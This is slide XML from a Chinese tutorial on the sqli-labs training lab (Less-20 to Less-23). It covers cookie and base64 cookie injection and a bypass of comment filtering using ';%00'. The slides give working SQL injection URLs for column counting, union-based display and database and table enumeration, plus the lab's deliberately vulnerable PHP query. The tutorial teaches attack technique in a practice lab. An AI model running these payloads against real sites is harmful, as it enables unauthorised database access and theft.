              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=“SELECT * FROM users WHERE username=‘$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>cookee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’ LIMIT 0,1”; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在登录之后后台会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>放入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中，再次登录的时候，只要是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>没有过期，就会去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>里面取值，然后进行查询。</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b="1" dirty="0"/>
              <a:t>Cookie Editor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>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66872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Less-21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06398"/>
            <a:ext cx="11762509" cy="4702849"/>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20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>关相似，只不过这一次将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>转码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    YWRtaW4=  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>解码之后为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>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77276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160623"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-22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21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>关相似，只不过这一次将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>换为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>即可！</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49741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8B1F2-33DE-4A56-A4A9-6C063A735411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060575" y="195542"/>
            <a:ext cx="10131425" cy="442293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>更正</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B38AF0A6-4972-4BEC-A10A-C9EBD713B1FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263237" y="1482437"/>
            <a:ext cx="11734800" cy="4958874"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在前些视频中，我将查库、查表、查字段、查字段中的值，其中我将查字段说成了查列，实在是抱歉，由于自己能力有限，没有注意到这一点。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>大家不要直接复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中的字段等信息到浏览器中，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中会将英文的逗号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>单引号等进行转换，到时候你就会出错，所以大家一定要看清楚！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>接下里的视频中有部分关卡因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>解析字段的问题，我会在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的平台下进行讲解，希望大家能够注意。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>视频和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中难免会有很多的错误，希望大家能够谅解！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>本次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>全套视频和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>等课件均属于免费分享，所以也希望大家能够谅解一些错误的存在，本次教程只能保证你对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>常识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>作一个简单的了解，不一定可以让你掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>注入，毕竟在实际环境中，由于各种原因，情况极其复杂。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>联系邮箱：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>crow_821@163.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>:   3139354876   </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2451179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997527"/>
            <a:ext cx="11762509" cy="5383748"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>首先在代码中加入：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>echo "&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>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http://127.0.0.1/sqli/Less-23/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>显示的有信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>2.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此时显示报错</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0">
                <a:hlinkClick r:id="rId3">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此时无法进行闭合</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>我们回到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>less-01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>在第一关中，我们看到可以正常使用闭合。此时我们查阅源码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>$reg = "/#/";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>$reg1 = "/--/";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>$replace = "";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>$id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>($reg, $replace, $id);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>$id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>($reg1, $replace, $id);   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>源码中对于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>--+      # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>进行了过滤处理，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>所以这里我们只能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>语句进行闭合</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>在这里可以使用另外一种特殊的注释符   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>通过这个注释符可以判断列数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1459442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9436"/>
            <a:ext cx="11762509" cy="6118564"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>法一：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>;%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在这里可以使用另外一种特殊的注释符   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通过这个注释符可以判断列数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>除了在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>末尾将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>替换为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> ;%00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>其余的均和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>关相同。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://121.199.30.46/Less-23/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>返回正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://121.199.30.46/Less-23/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>返回异常，说明可能存在漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://121.199.30.46/Less-23/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’ --+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://121.199.30.46/Less-23/?id=1’ # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>均返回错误，通过源代码分析，我们得知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>--+    #  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>都被替换为了空格，这里使用      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>;%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>充当注释符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. http://121.199.30.46/Less-23/?id=1‘  order by 3  ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查多少列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. http://121.199.30.46/Less-23/?id=-1’  union select 1,2,3    ;%00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查找回显位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. http://121.199.30.46/Less-23/?id=-1‘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;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>7. http://121.199.30.46/Less-23/?id=-1‘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0x7365637572697479    ;%00  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>8. http://121.199.30.46/Less-23/?id=-1‘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;%00 </a:t>
            </a:r>
